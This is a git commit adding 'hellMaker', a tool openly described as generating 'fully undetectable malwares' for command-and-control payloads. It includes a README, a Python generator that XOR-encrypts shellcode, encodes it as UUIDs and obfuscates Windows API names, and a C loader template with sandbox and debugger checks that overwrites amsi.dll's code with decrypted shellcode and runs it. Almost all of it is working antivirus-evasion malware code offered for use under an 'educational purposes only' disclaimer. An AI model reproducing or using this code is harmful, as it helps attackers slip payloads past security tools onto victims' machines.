Initial commit

2022-12-14 17:21:41 -05:00
commit 12bbeb2954
5 changed files with 433 additions and 0 deletions
@@ -0,0 +1,50 @@
+# hellMaker
+hellMaker is a tool for generating fully undetectable malwares for any C&C tool you want, it uses several evasion techniques.
+
+## Features
+- shellcode encryption using xor method
+- shellcode UUID Obfuscation
+- IAT Hiding & Obfuscation
+- Bypass memory monitoring
+- Evade behavior analysis and sandbox using several techniques
+- Obfuscate all static stuff using random key
+- Anti Debugging
+
+## Installation
+- Git clone this repo
+- Change dir into the folder
+- The tool doesn't require any dependencies
+- Run `python3 hellMaker.py`
+
+## Usage
+First, you need to create a raw shellcode using the C2 tool you prefer,\
+then run the tool and enter the shellcode and Encryption key and the output filename.\
+```
+┌──(user㉿hostname)-[~/path/to/hellMaker]
+└─$ python3 hellMaker.py
+
+         _          _ _ __  __       _             
+        | |__   ___| | |  \/  | __ _| | _____ _ __ 
+        | '_ \ / _ \ | | |\/| |/ _` | |/ / _ \ '__|
+        | | | |  __/ | | |  | | (_| |   <  __/ |   
+        |_| |_|\___|_|_|_|  |_|\__,_|_|\_\___|_|   
+                Author -> Abdallah Mohamed                                        
+
+    
+        Usage:
+                ./hellMaker.py <path/to/shellcode.bin> <EncryptionKey> <Output.c>
+
+
+```
+
+## Run
+![](imgs/Run.png)
+
+## Test
+![](imgs/FUD.png)
+
+## Compile
+`cl <payload>.c` using visual studio
+
+## Warning
+I am not responsible for any of your actions, this tool for educational purposes only.
@@ -0,0 +1,200 @@
+#!/usr/bin/python3
+
+import uuid, random, sys, os.path, string
+
+
+TEMPLATE_PATH = "templates/template.c"
+
+
+class Color:
+    BIBlue   = "\033[1;94m"
+    BIRed    = "\033[1;91m"
+    Red      = "\033[0;31m"
+    Green    = "\033[0;32m"
+    Bold     = "\033[1m"
+    NC       = "\033[0m"   # No Color
+
+
+def banner():
+    print(Color.BIBlue + f"""
+         _          _ _ __  __       _             
+        | |__   ___| | |  \/  | __ _| | _____ _ __ 
+        | '_ \ / _ \ | | |\/| |/ _` | |/ / _ \ '__|
+        | | | |  __/ | | |  | | (_| |   <  __/ |   
+        |_| |_|\___|_|_|_|  |_|\__,_|_|\_\___|_|   
+                {Color.NC}{Color.BIRed}Author{Color.NC}{Color.Bold} -> Abdallah Mohamed                                        
+
+    """ + Color.NC)
+
+def usage():
+    print(f"\tUsage:\n\t\t./{os.path.basename(sys.argv[0])} <path/to/shellcode.bin> <EncryptionKey> <Output.c>\n\n")
+
+
+def display(msg, color, **args):
+    print(f"\t - {color}{msg}{Color.NC}", **args)
+
+def display_info(msg, **args):
+    display(msg, Color.Green, **args)
+
+def display_warn(msg, **args):
+    display(msg, Color.Bold, **args)
+
+def display_fail(msg, **args):
+    display(msg, Color.Red, **args)
+
+
+def read_file(fileName, mode):
+    with open(fileName, mode) as f:
+        return f.read()
+
+def write_file(fileName, mode, data):
+    with open(fileName, mode) as f:
+        return f.write(data)
+
+
+def create_random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for _ in range(length))
+
+
+def get_data_elements(data):
+    return list(map(ord, data))
+
+
+def obfuscate_data(data, key):
+    elements = get_data_elements(data)
+    obfuscated_data = bytes(
+        (elements[i] ^ key) for i in range(0, len(elements))
+    )
+
+    obfuscated_data += b'\x00' # Append NULL at the end of the data
+    return obfuscated_data
+
+
+def encrypt_shellcode(shellcode, size, encKey):
+    keySize = len(encKey)
+    elements = get_data_elements(encKey)
+    return bytes(
+        (shellcode[idx] ^ elements[idx % keySize]) for idx in range(0, size)
+    )
+
+
+def chunked(data, size):
+    for i in range(0, len(data), size):
+        yield data[i:i + size]
+
+
+def convert_to_uuids(data):
+    chunks = list(chunked(data, 16))
+    last_element_size = len(chunks[-1])
+
+    if last_element_size != 16:
+        padding = 16 - last_element_size
+        chunks[-1] = chunks[-1] + (b'\x90' * padding)
+
+    uuids = "{\n"
+    for chunk in chunks:
+        uuids += f"{' ' * 8}\"{uuid.UUID(bytes_le=chunk)}\",\n"
+
+    return uuids[:-2] + "\n}"
+
+
+def convert_to_hex(data):
+    return [hex(i) for i in data]
+
+
+def obfuscate_and_convert_data_to_c_fmt(data, key):
+    fmt = '{ '
+    elements = convert_to_hex(obfuscate_data(data, key))
+    
+    for i in elements:
+        fmt += i + ', '
+
+    return fmt[:-2] + ' }'
+
+
+def run(fileName, encKey, output):
+    shellcode = read_file(fileName, 'rb')
+    template = read_file(TEMPLATE_PATH, 'r')
+    shellcode_size = len(shellcode)
+    key = random.randint(200, 255)
+
+    display_info("Encrypt shellcode using xor method")
+    encrypted_shellcode = encrypt_shellcode(shellcode, shellcode_size, encKey)
+
+    display_info("Convert encrypted shellcode to UUIDs")
+    template = template.replace('"UUIDs"', convert_to_uuids(encrypted_shellcode))
+
+    display_info("Obfuscate encryption key")
+    template = template.replace('"DECKEY"', obfuscate_and_convert_data_to_c_fmt(encKey, key))
+
+    display_info("Set PREPROCESSORs values")
+    template = template.replace('"KEY"', hex(key))
+    template = template.replace('"SIZE"', hex(shellcode_size))
+
+    display_info("Obfuscate Modules and APIs")
+    template = template.replace('"kernel32.dll"', obfuscate_and_convert_data_to_c_fmt("kernel32.dll", key))
+    template = template.replace('"amsi.dll"', obfuscate_and_convert_data_to_c_fmt("amsi.dll", key))
+    template = template.replace('"VirtualProtect"', obfuscate_and_convert_data_to_c_fmt("VirtualProtect", key))
+    template = template.replace('"CreateThread"', obfuscate_and_convert_data_to_c_fmt("CreateThread", key))
+    template = template.replace('"WaitForSingleObject"', obfuscate_and_convert_data_to_c_fmt("WaitForSingleObject", key))
+    template = template.replace('"CheckRemoteDebuggerPresent"', obfuscate_and_convert_data_to_c_fmt("CheckRemoteDebuggerPresent", key))
+
+    display_info("Save malware source code in '%s'" % output)
+    write_file(output, 'w+', template)
+
+    display("Compile it and Hack The World! ^_^", Color.Bold)
+
+
+def main():
+    banner()
+
+    args = sys.argv
+    args_len = len(args)
+
+    if args_len < 2:
+        usage()
+        return 1
+
+    if not os.path.exists(args[1]):
+        display_fail("shellcode file does not exist in '%s' !!!" % args[1])
+        return 1
+
+    if args_len < 3:
+        encKey = create_random_string(random.randint(8, 12))
+        display_warn("You didn't enter the encryption key")
+        display_info("hellMaker will use this random key => '%s'" % encKey)
+    else:
+        encKey = args[2]
+
+    if args_len < 4:
+        output = "hellInjector.c"
+        display_warn("You didn't enter output file name")
+        display_info("hellMaker will save your output file in '%s'" % output)
+    else:
+        output = args[3]
+
+    if not os.path.exists(TEMPLATE_PATH):
+        display_fail("This is bad, Malware template does not exist !!!")
+        display_warn("Please reinstall the tool")
+        return 1
+
+    if os.path.exists(output):
+        display_warn("'%s' already exists, do you want to overwrite it [Y,n] : " % output, end='')
+
+        try:
+            key = input()
+        except KeyboardInterrupt:
+            display_fail("Enter valid value")
+            return 1
+
+        if key.lower() != 'y':
+            print()
+            display_fail("Try again !!!")
+            return 1
+
+
+    run(args[1], encKey, output)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,183 @@
+
+#include <Windows.h>
+#include <TlHelp32.h>
+#include <stdio.h>
+
+#pragma comment (lib, "Rpcrt4.lib")
+
+#define KEY "KEY"
+#define KEYSIZE sizeof(decKey) - 1
+#define SHELLSIZE "SIZE"
+
+
+typedef LPVOID(WINAPI *VirtualProtectFunc)(LPVOID, SIZE_T, DWORD, PDWORD);
+typedef HANDLE(WINAPI *CreateThreadFunc)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
+typedef DWORD(WINAPI *WaitForSingleObjectFunc)(HANDLE, DWORD);
+typedef BOOL(WINAPI *CheckRemoteDebuggerPresentFunc)(HANDLE, PBOOL);
+
+
+char cLib1Name[] = "kernel32.dll";
+char cLib2Name[] = "amsi.dll";
+char cVirtualProtect[] = "VirtualProtect";
+char cCreateThread[] = "CreateThread";
+char cWaitForSingleObject[] = "WaitForSingleObject";
+char cCheckRemoteDebuggerPresentFunc[] = "CheckRemoteDebuggerPresent";
+
+char decKey[] = "DECKEY";
+
+char *uuids[] = "UUIDs";
+
+unsigned char pShell[SHELLSIZE]; 
+
+VirtualProtectFunc pVirtualProtectFunc;
+CreateThreadFunc pCreateThreadFunc;
+WaitForSingleObjectFunc pWaitForSingleObjectFunc;
+CheckRemoteDebuggerPresentFunc pCheckRemoteDebuggerPresentFunc;
+
+void deObfuscateData(char *data)
+{
+    for (int idx = 0; idx < strlen(data); idx++)
+    {
+        data[idx] = data[idx] ^ KEY;
+    }
+    
+}
+
+void deObfuscateAll()
+{
+    deObfuscateData(decKey);
+    deObfuscateData(cLib1Name);
+    deObfuscateData(cLib2Name);
+    deObfuscateData(cVirtualProtect);
+    deObfuscateData(cCreateThread);
+    deObfuscateData(cWaitForSingleObject);
+    deObfuscateData(cCheckRemoteDebuggerPresentFunc);
+}
+
+void decShell()
+{
+    for (int idx = 0, ctr = 0; idx < SHELLSIZE; idx++)
+    {
+        ctr = (ctr == KEYSIZE) ? 0 : ctr;
+        pShell[idx] = pShell[idx] ^ decKey[ctr++];
+    }
+
+}
+
+int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
+{  
+    DWORD_PTR pFuncAddr, pShellReader;
+    DWORD dwOldProtect = 0, dwProcId;
+    HMODULE hModule, hModule2;
+    HANDLE hThread, hSnapshot;
+    BOOL bTrap = FALSE;
+    char *pMem;
+    int nMemAlloc, nCtr = 0;
+    PROCESSENTRY32 pe32;
+    FILE *pFile;
+
+    dwProcId = GetCurrentProcessId();
+    
+    if ((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, dwProcId)))
+    {
+        if (Process32First(hSnapshot, &pe32)) 
+        {
+            do {
+                if (pe32.th32ProcessID == dwProcId)
+                {
+                    if (!(pFile = fopen((LPCSTR)pe32.szExeFile, "rb")))
+                    {
+                        return EXIT_FAILURE;
+                    } else {
+                        fclose(pFile);
+                        break;
+                    }
+                }
+            } while (Process32Next(hSnapshot, &pe32));
+        }
+
+        CloseHandle(hSnapshot);
+    } 
+
+    if (pFile = fopen(cLib2Name, "rb"))
+    {
+        return EXIT_FAILURE;
+    }
+
+    deObfuscateAll();
+
+    if (!(
+        (hModule = LoadLibraryA((LPCSTR)cLib1Name)) &&
+        (hModule2 = LoadLibraryA((LPCSTR)cLib2Name))
+    )) {
+        return EXIT_FAILURE;
+    }
+
+    if (!(
+        (pVirtualProtectFunc = (VirtualProtectFunc) GetProcAddress(hModule, cVirtualProtect)) &&
+        (pCreateThreadFunc = (CreateThreadFunc) GetProcAddress(hModule, cCreateThread)) &&
+        (pWaitForSingleObjectFunc = (WaitForSingleObjectFunc) GetProcAddress(hModule, cWaitForSingleObject)) &&
+        (pCheckRemoteDebuggerPresentFunc = (CheckRemoteDebuggerPresentFunc) GetProcAddress(hModule, cCheckRemoteDebuggerPresentFunc))
+    )) {
+        return EXIT_FAILURE;
+    }
+    
+    if (!pCheckRemoteDebuggerPresentFunc(GetCurrentProcess(), &bTrap) || bTrap)
+    {
+        return EXIT_FAILURE;
+    }
+
+    nMemAlloc = KEY << 20;
+
+    if (!(pMem = (char *) malloc(nMemAlloc)))
+    {
+        return EXIT_FAILURE;
+    }
+
+    for (int idx = 0; idx < nMemAlloc; idx++)
+    {
+        pMem[nCtr++] = 0x00;
+    }
+    
+    if (nMemAlloc != nCtr)
+    {
+        return EXIT_FAILURE;
+    }
+
+    pShellReader = (DWORD_PTR) pShell;
+
+    for (int idx = 0; idx < sizeof(uuids) / sizeof(PCHAR); idx++)
+    {
+        if (UuidFromStringA((RPC_CSTR)uuids[idx], (UUID *)pShellReader) == RPC_S_INVALID_STRING_UUID)
+        {
+            return EXIT_FAILURE;
+        }
+        
+        pShellReader += 0x10;
+    }
+
+    free(pMem);
+    decShell();
+    pFuncAddr = (DWORD_PTR) hModule2 + 0x1000;
+    
+    if (pVirtualProtectFunc((LPVOID)pFuncAddr, SHELLSIZE, PAGE_READWRITE, &dwOldProtect) == 0)
+    {
+        return EXIT_FAILURE;
+    }
+
+    RtlCopyMemory((LPVOID)pFuncAddr, pShell, SHELLSIZE);
+
+    if (pVirtualProtectFunc((LPVOID)pFuncAddr, SHELLSIZE, dwOldProtect, &dwOldProtect) == 0)
+    {
+        return EXIT_FAILURE;
+    }
+
+    if ((hThread = pCreateThreadFunc(0, 0, (LPTHREAD_START_ROUTINE)pFuncAddr, 0, 0, 0)) == NULL)
+    {
+        return EXIT_FAILURE;
+    }
+
+    pWaitForSingleObjectFunc(hThread, -1);
+
+    return EXIT_SUCCESS;
+}